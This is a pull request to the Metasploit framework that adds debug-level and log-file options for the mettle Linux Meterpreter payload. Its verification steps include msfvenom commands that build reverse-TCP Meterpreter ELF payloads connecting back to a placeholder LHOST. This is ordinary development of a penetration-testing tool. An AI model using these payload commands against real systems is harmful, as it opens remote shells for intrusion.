### PR TITLE
Add support for mettle debug

### DIFF
--- a/lib/msf/base/sessions/mettle_config.rb
+++ b/lib/msf/base/sessions/mettle_config.rb
@@ -71,6 +71,14 @@ module Msf
           opts[:name] ||= ds['PayloadProcessCommandLine']
         end
 
+        if ds['RemoteMeterpreterDebugFile'] != ''
+          opts[:log_file] ||= ds['RemoteMeterpreterDebugFile']
+        end
+
+        log_level = ds['MeterpreterDebugLevel'].to_i
+        log_level = 0 if log_level < 0
+        log_level = 3 if log_level > 3
+        opts[:debug] = log_level
         opts[:uuid] ||= generate_payload_uuid
 
         case opts[:scheme]

--- a/lib/msf/core/payload/linux.rb
+++ b/lib/msf/core/payload/linux.rb
@@ -82,6 +82,20 @@ module Msf::Payload::Linux
             "false"
           ]
         ),
+        Msf::OptInt.new('MeterpreterDebugLevel',
+          [
+            true,
+            "Set debug level for meterpreter 0-3 (Default output is strerr)",
+            0
+          ]
+        ),
+        Msf::OptString.new('RemoteMeterpreterDebugFile',
+          [
+            false,
+            "Redirect Debug Info to a Log File",
+            ""
+          ]
+        ),
       ], Msf::Payload::Linux)
 
     ret


### PR DESCRIPTION
This PR adds options to set debug level and debug log file values that are passed into mettle using the changes in https://github.com/rapid7/mettle/pull/155

## Verification

List the steps needed to make sure this thing works

Make a stageless mettle payload with debug level set to 3 (highest):
- [x] `./msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf  -o my_payload.elf MeterpreterDebugLevel=3 LHOST=<IP> LPORT=<PORT>`
- [x] Set up a listener locally (do not set any debugging options- you shouldn't see them, anyway)
- [x] Launch the payload
- [x] Verify mettle logs to the console

Make a staged mettle payload with debug level set to 3 (highest):
- [x] `./msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf  -o my_payload.elf LHOST=<IP> LPORT=<PORT>`
- [x] Set up a listener locally
- [x] `set MeterpreterDebugLevel 3`
- [x] Launch the payload
- [x] Verify mettle logs to the console

Make a stageless mettle payload with debug level set to 3 (highest) and set the log file location:
- [x] `./msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf  -o my_payload.elf MeterpreterDebugLevel=3 RemoteMeterpreterDebugFile="/tmp/meterpreter" LHOST=<IP> LPORT=<PORT>`
- [x] Set up a listener locally (do not set any debugging options- you shouldn't see them, anyway)
- [x] Launch the payload
- [x] Verify mettle logs to the provided file

Make a staged mettle payload with debug level set to 3 (highest) and the log_file value set
- [x] `./msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf  -o my_payload.elf LHOST=<IP> LPORT=<PORT>`
- [x] Set up a listener locally
- [x] `set MeterpreterDebugLevel 3`
- [x] `set RemoteMeterpreterDebugFile /tmp/meterpreter`
- [x] Launch the payload
- [x] Verify mettle logs to the provided file
